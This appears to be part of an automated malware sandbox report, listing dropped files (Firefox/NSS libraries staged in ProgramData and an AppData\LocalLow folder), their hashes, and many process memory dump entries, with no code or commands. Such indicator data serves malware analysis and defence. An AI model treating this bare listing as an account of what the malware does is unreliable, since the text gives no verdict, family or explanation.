02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

Download Submit
C:\Windows\temp\r0ayxmyt.inf

Download Submit
\ProgramData\mozglue.dll

Download Submit
\ProgramData\nss3.dll

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\sqlite3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll

MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

Download Submit
memory/552-403-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/552-409-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/552-406-0x000000000040C76E-mapping.dmp

Download
memory/1316-204-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1316-239-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/1316-205-0x000000000040616E-mapping.dmp

Download
memory/1316-217-0x0000000005530000-0x0000000005531000-memory.dmp

Filesize
4KB

Download
memory/1316-208-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/1376-280-0x0000000000000000-mapping.dmp

Download
memory/1376-287-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/1424-11-0x0000000000000000-mapping.dmp

Download
memory/1444-21-0x0000000000000000-mapping.dmp

Download
memory/1620-593-0x0000000000000000-mapping.dmp

Download
memory/1768-289-0x0000000000000000-mapping.dmp

Download
memory/1768-297-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/1796-175-0x0000000000000000-mapping.dmp

Download
memory/1796-383-0x0000000004E60000-0x0000000004E92000-memory.dmp

Filesize
200KB

Download
memory/1796-389-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/1796-181-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

Filesize
4KB

Download
memory/1796-179-0x00000000005B0000-0x00000000005B1000-memory.dmp

Filesize
4KB

Download
memory/1796-178-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/1804-136-0x000000000041A684-mapping.dmp

Download
memory/1804-135-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1804-139-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1840-285-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/1840-277-0x0000000000000000-mapping.dmp

Download
memory/1904-142-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1904-138-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1904-140-0x0000000000417A8B-mapping.dmp

Download
memory/2096-174-0x0000000000000000-mapping.dmp

Download
memory/2100-35-0x0000000007820000-0x0000000007821000-memory.dmp

Filesize
4KB

Download
memory/2100-83-0x0000000008C70000-0x0000000008C71000-memory.dmp

Filesize
4KB

Download
memory/2100-54-0x0000000008040000-0x0000000008041000-memory.dmp

Filesize
4KB

Download
memory/2100-37-0x0000000007890000-0x0000000007891000-memory.dmp

Filesize
4KB

Download
memory/2100-59-0x0000000007EF0000-0x0000000007EF1000-memory.dmp

Filesize
4KB

Download
memory/2100-52-0x0000000006DC0000-0x0000000006DC1000-memory.dmp

Filesize
4KB

Download
memory/2100-33-0x0000000006F80000-0x0000000006F81000-memory.dmp

Filesize
4KB

Download
memory/2100-12-0x0000000000000000-mapping.dmp

Download
memory/2100-82-0x00000000096D0000-0x00000000096D1000-memory.dmp

Filesize
4KB

Download
memory/2100-15-0x00000000706C0000-0x0000000070DAE000-memory.dmp

Filesize
6.9MB

Download
memory/2100-28-0x0000000006E50000-0x0000000006E51000-memory.dmp

Filesize
4KB

Download
memory/2112-601-0x0000000000000000-mapping.dmp

Download
memory/2160-5-0x0000000000000000-mapping.dmp

Download
memory/2412-119-0x0000000000000000-mapping.dmp

Download
memory/2592-118-0x0000000000000000-mapping.dmp

Download
memory/2800-0-0x0000000000000000-mapping.dmp

Download
memory/3192-173-0x0000000000000000-mapping.dmp

Download
memory/3268-111-0x0000000000000000-mapping.dmp

Download
memory/3408-272-0x0000000000000000-mapping.dmp

Download
memory/3408-278-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/3884-13-0x0000000000B30000-0x0000000000B30005-memory.dmp

Filesize
5B

Download
memory/3884-7-0x0000000000000000-mapping.dmp

Download
memory/3884-6-0x0000000000000000-mapping.dmp

Download
memory/3884-10-0x0000000002530000-0x00000000025ED000-memory.dmp

Filesize
756KB

Download
memory/3944-586-0x0000000000000000-mapping.dmp

Download
memory/3952-3-0x0000000000000000-mapping.dmp

Download
memory/3956-214-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/3956-219-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/3956-215-0x0000000000403BEE-mapping.dmp

Download
memory/3964-19-0x0000000006E10000-0x0000000006E11000-memory.dmp

Filesize
4KB

Download
memory/3964-14-0x0000000000000000-mapping.dmp

Download
memory/3964-16-0x00000000706C0000-0x0000000070DAE000-memory.dmp

Filesize
6.9MB

Download
memory/3964-17-0x0000000000D80000-0x0000000000D81000-memory.dmp

Filesize
4KB

Download
memory/4104-249-0x0000000000000000-mapping.dmp

Download
memory/4168-24-0x0000000000000000-mapping.dmp

Download
memory/4184-25-0x0000000000000000-mapping.dmp

Download
memory/4196-242-0x0000000000000000-mapping.dmp

Download
memory/4200-27-0x00000000706C0000-0x0000000070DAE000-memory.dmp

Filesize
6.9MB

Download
memory/4200-100-0x000000000A240000-0x000000000A241000-memory.dmp

Filesize
4KB

Download
memory/4200-26-0x0000000000000000-mapping.dmp

Download
memory/4200-98-0x0000000009260000-0x0000000009261000-memory.dmp

Filesize
4KB

Download
memory/4200-99-0x0000000008030000-0x0000000008031000-memory.dmp

Filesize
4KB

Download
memory/4240-273-0x0000000000000000-mapping.dmp

Download
memory/4240-279-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4292-274-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4292-268-0x0000000000000000-mapping.dmp

Download
memory/4304-299-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4304-293-0x0000000000000000-mapping.dmp

Download
memory/4348-248-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4348-245-0x0000000000000000-mapping.dmp

Download
memory/4348-250-0x0000000000A80000-0x0000000000A81000-memory.dmp

Filesize
4KB

Download
memory/4348-244-0x0000000000000000-mapping.dmp

Download
memory/4360-281-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4360-276-0x0000000000000000-mapping.dmp

Download
memory/4368-128-0x000000000043FA56-mapping.dmp

Download
memory/4368-125-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/4368-131-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/4384-39-0x00000000706C0000-0x0000000070DAE000-memory.dmp

Filesize
6.9MB

Download
memory/4384-32-0x0000000000000000-mapping.dmp

Download
memory/4492-200-0x0000000000000000-mapping.dmp

Download
memory/4500-309-0x0000000006A30000-0x0000000006A31000-memory.dmp

Filesize
4KB

Download
memory/4500-265-0x00000000090A0000-0x00000000090A1000-memory.dmp

Filesize
4KB

Download
memory/4500-231-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/4500-257-0x0000000008D50000-0x0000000008D83000-memory.dmp

Filesize
204KB

Download
memory/4500-241-0x00000000081D0000-0x00000000081D1000-memory.dmp

Filesize
4KB

Download
memory/4500-264-0x0000000008D30000-0x0000000008D31000-memory.dmp

Filesize
4KB

Download
memory/4500-311-0x0000000006A20000-0x0000000006A21000-memory.dmp

Filesize
4KB

Download
memory/4500-224-0x0000000000000000-mapping.dmp

Download
memory/4500-237-0x0000000007910000-0x0000000007911000-memory.dmp

Filesize
4KB

Download
memory/4604-267-0x0000000000000000-mapping.dmp

Download
memory/4604-271-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4696-51-0x0000000000000000-mapping.dmp

Download
memory/4704-252-0x0000000000000000-mapping.dmp

Download
memory/4704-254-0x000001D684990000-0x000001D684991000-memory.dmp

Filesize
4KB

Download
memory/4704-253-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4704-255-0x000001D69F840000-0x000001D69F841000-memory.dmp

Filesize
4KB

Download
memory/4720-194-0x0000000000000000-mapping.dmp

Download
memory/4760-209-0x0000000005190000-0x00000000051CD000-memory.dmp

Filesize
244KB

Download
memory/4760-198-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/4760-197-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/4760-193-0x0000000000000000-mapping.dmp

Download
memory/4796-64-0x00000000706C0000-0x0000000070DAE000-memory.dmp

Filesize
6.9MB

Download
memory/4796-58-0x0000000000000000-mapping.dmp

Download
memory/4848-295-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-286-0x0000000000000000-mapping.dmp

Download
memory/4856-103-0x0000000000000000-mapping.dmp

Download
memory/4864-63-0x0000000000000000-mapping.dmp

Download
memory/4944-229-0x00000000045A0000-0x00000000046A1000-memory.dmp

Filesize
1.0MB

Download
memory/4944-220-0x0000000000000000-mapping.dmp

Download
memory/4952-592-0x0000000000000000-mapping.dmp

Download
memory/4972-71-0x00000000706C0000-0x0000000070DAE000-memory.dmp

Filesize
6.9MB

Download
memory/4972-69-0x0000000000000000-mapping.dmp

Download
memory/4992-583-0x0000000050480000-0x000000005049A000-memory.dmp

Filesize
104KB

Download
memory/4992-598-0x0000000010530000-0x000000001054B000-memory.dmp

Filesize
108KB

Download
memory/4992-184-0x0000000000000000-mapping.dmp

Download
memory/4992-324-0x0000000004AE0000-0x0000000004B2D000-memory.dmp

Filesize
308KB

Download
memory/5020-190-0x00000000728E0000-0x0000000072FCE000-memory.dmp

Filesize
6.9MB

Download
memory/5020-201-0x0000000004970000-0x00000000049AE000-memory.dmp

Filesize
248KB

Download
memory/5020-187-0x0000000000000000-mapping.dmp

Download
memory/5020-191-0x00000000000C0000-0x00000000000C1000-memory.dmp

Filesize
4KB

Download
memory/5020-202-0x00000000049B0000-0x00000000049C6000-memory.dmp

Filesize
88KB

Download
memory/5044-283-0x0000000000000000-mapping.dmp

Download
memory/5044-292-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/5096-275-0x00007FF8D8BA0000-0x00007FF8D958C000-memory.dmp

Filesize
9.9MB

Download
memory/5096-269-0x0000000000000000-mapping.dmp

Download
memory/5104-594-0x0000000000000000-mapping.dmp

Download
memory/5160-587-0x00000000005A0000-0x00000000005A1000-memory.dmp

Filesize
4KB

Download
memory/5160-589-0x0000000000860000-0x0000000000861000-memory.dmp

Filesize
4KB

Download
memory/5160-590-0x0000000000000000-mapping.dmp

Download
memory/5160-588-0x0000000000000000-mapping.dmp

Download
memory/5160-597-0x0000000000000000-mapping.dmp

Download
memory/5160-599-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/5160-600-0x0000000000000000-mapping.dmp

Download
memory/5524-595-0x0000000000000000-mapping.dmp

Download
memory/5804-367-0x0000000000000000-mapping.dmp

Download
memory/5804-377-0x0000000000000000-mapping.dmp

Download
memory/5804-379-0x0000000000000000-mapping.dmp

Download
memory/5804-381-0x0000000000000000-mapping.dmp

Download
memory/5804-375-0x0000000000000000-mapping.dmp

Download
memory/5804-384-0x0000000000000000-mapping.dmp

Download
memory/5804-386-0x0000000000000000-mapping.dmp

Download
memory/5804-388-0x0000000000000000-mapping.dmp

Download
memory/5804-373-0x0000000000000000-mapping.dmp

Download
memory/5804-391-0x0000000000000000-mapping.dmp

Download
memory/5804-393-0x0000000000000000-mapping.dmp

Download
memory/5804-395-0x0000000000000000-mapping.dmp

Download
memory/5804-397-0x0000000000000000-mapping.dmp

Download
memory/5804-399-0x0000000000000000-mapping.dmp

Download
memory/5804-402-0x0000000000000000-mapping.dmp

Download
memory/5804-371-0x0000000000000000-mapping.dmp

Download
memory/5804-405-0x0000000000000000-mapping.dmp

Download
memory/5804-369-0x0000000000000000-mapping.dmp

Download
memory/5804-365-0x0000000000000000-mapping.dmp

Download
memory/5804-410-0x0000000000000000-mapping.dmp

Download
memory/5804-363-0x0000000000000000-mapping.dmp

Download
memory/5804-413-0x0000000000000000-mapping.dmp

Download
memory/5804-416-0x0000000000000000-mapping.dmp

Download
memory/5804-418-0x0000000000000000-mapping.dmp

Download
memory/5804-420-0x0000000000000000-mapping.dmp

Download
memory/5804-422-0x0000000000000000-mapping.dmp

Download
memory/5804-424-0x0000000000000000-mapping.dmp

Download
memory/5804-426-0x0000000000000000-mapping.dmp

Download
memory/5804-428-0x0000000000000000-mapping.dmp

Download
memory/5804-430-0x0000000000000000-mapping.dmp

Download
memory/5804-432-0x0000000000000000-mapping.dmp

Download
memory/5804-434-0x0000000000000000-mapping.dmp

Download
memory/5804-436-0x0000000000000000-mapping.dmp

Download
memory/5804-438-0x0000000000000000-mapping.dmp

Download
memory/5804-440-0x0000000000000000-mapping.dmp

Download
memory/5804-444-0x0000000000000000-mapping.dmp

Download
memory/5804-442-0x0000000000000000-mapping.dmp

Download
memory/5804-446-0x0000000000000000-mapping.dmp

Download
memory/5804-448-0x0000000000000000-mapping.dmp

Download
memory/5804-450-0x0000000000000000-mapping.dmp

Download
memory/5804-452-0x0000000000000000-mapping.dmp

Download
memory/5804-454-0x0000000000000000-mapping.dmp

Download
memory/5804-456-0x0000000000000000-mapping.dmp

Download
memory/5804-458-0x0000000000000000-mapping.dmp

Download
memory/5804-460-0x0000000000000000-mapping.dmp

Download
memory/5804-462-0x0000000000000000-mapping.dmp

Download
memory/5804-464-0x0000000000000000-mapping.dmp

Download
memory/5804-466-0x0000000000000000-mapping.dmp

Download
memory/5804-468-0x0000000000000000-mapping.dmp

Download
memory/5804-470-0x0000000000000000-mapping.dmp

Download
memory/5804-472-0x0000000000000000-mapping.dmp

Download
memory/5804-474-0x0000000000000000-mapping.dmp

Download
memory/5804-476-0x0000000000000000-mapping.dmp

Download
memory/5804-478-0x0000000000000000-mapping.dmp

Download
memory/5804-480-0x0000000000000000-mapping.dmp

Download
memory/5804-482-0x0000000000000000-mapping.dmp

Download
memory/5804-484-0x0000000000000000-mapping.dmp

Download
memory/5804-486-0x0000000000000000-mapping.dmp

Download
memory/5804-488-0x0000000000000000-mapping.dmp

Download
memory/5804-490-0x0000000000000000-mapping.dmp

Download
memory/5804-492-0x0000000000000000-mapping.dmp

Download
memory/5804-494-0x0000000000000000-mapping.dmp

Download
memory/5804-496-0x0000000000000000-mapping.dmp

Download
memory/5804-498-0x0000000000000000-mapping.dmp

Download
memory/5804-500-0x0000000000000000-mapping.dmp

Download
memory/5804-502-0x0000000000000000-mapping.dmp

Download
memory/5804-504-0x0000000000000000-mapping.dmp

Download
memory/5804-506-0x0000000000000000-mapping.dmp

Download
memory/5804-508-0x0000000000000000-mapping.dmp

Download
memory/5804-510-0x0000000000000000-mapping.dmp

Download
memory/5804-512-0x0000000000000000-mapping.dmp

Download
memory/5804-514-0x0000000000000000-mapping.dmp

Download
memory/5804-516-0x0000000000000000-mapping.dmp

Download
memory/5804-518-0x0000000000000000-mapping.dmp

Download
memory/5804-520-0x0000000000000000-mapping.dmp

Download
memory/5804-522-0x0000000000000000-mapping.dmp

Download
memory/5804-524-0x0000000000000000-mapping.dmp

Download
memory/5804-526-0x0000000000000000-mapping.dmp

Download
memory/5804-528-0x0000000000000000-mapping.dmp

Download
memory/5804-530-0x0000000000000000-mapping.dmp

Download
memory/5804-532-0x0000000000000000-mapping.dmp

Download
memory/5804-534-0x0000000000000000-mapping.dmp

Download
memory/5804-536-0x0000000000000000-mapping.dmp

Download
memory/5804-538-0x0000000000000000-mapping.dmp

Download
memory/5804-540-0x0000000000000000-mapping.dmp

Download
memory/5804-542-0x0000000000000000-mapping.dmp

Download
memory/5804-544-0x0000000000000000-mapping.dmp

Download
memory/5804-546-0x0000000000000000-mapping.dmp

Download
memory/5804-548-0x0000000000000000-mapping.dmp

Download
memory/5804-550-0x0000000000000000-mapping.dmp

Download
memory/5804-552-0x0000000000000000-mapping.dmp

Download
memory/5804-554-0x0000000000000000-mapping.dmp

Download
memory/5804-556-0x0000000000000000-mapping.dmp

Download
memory/5804-558-0x0000000000000000-mapping.dmp

Download
memory/5804-560-0x0000000000000000-mapping.dmp

Download
memory/5804-562-0x0000000000000000-mapping.dmp

Download
memory/5804-564-0x0000000000000000-mapping.dmp

Download
memory/5804-566-0x0000000000000000-mapping.dmp

Download
memory/5804-568-0x0000000000000000-mapping.dmp

Download
memory/5804-570-0x0000000000000000-mapping.dmp

Download
memory/5804-572-0x0000000000000000-mapping.dmp

Download
memory/5804-574-0x0000000000000000-mapping.dmp

Download
memory/5804-576-0x0000000000000000-mapping.dmp

Download
memory/5804-578-0x0000000000000000-mapping.dmp

Download
memory/5804-580-0x0000000000000000-mapping.dmp

Download
memory/5804-361-0x0000000000000000-mapping.dmp

Download
memory/5804-582-0x0000000000000000-mapping.dmp

Download
memory/5804-585-0x0000000000000000-mapping.dmp

Download
memory/5804-584-0x0000000006450000-0x0000000006451000-memory.dmp

Filesize
4KB

Download
memory/5804-359-0x0000000000000000-mapping.dmp

Download
memory/5804-357-0x0000000000000000-mapping.dmp

Download
memory/5804-355-0x0000000000000000-mapping.dmp

Download
memory/5804-353-0x0000000000000000-mapping.dmp

Download
memory/5804-351-0x0000000000000000-mapping.dmp

Download
memory/5804-349-0x0000000000000000-mapping.dmp

Download
memory/5804-347-0x0000000000000000-mapping.dmp

Download
memory/5804-345-0x0000000000000000-mapping.dmp

Download
memory/5804-343-0x0000000000000000-mapping.dmp

Download
memory/5804-341-0x0000000000000000-mapping.dmp

Download
memory/5804-339-0x0000000000000000-mapping.dmp

Download
memory/5804-337-0x0000000000000000-mapping.dmp

Download
memory/5804-336-0x0000000002A70000-0x0000000002A71000-memory.dmp

Filesize
4KB

Download
memory/5804-335-0x0000000000000000-mapping.dmp

Download
memory/5804-334-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download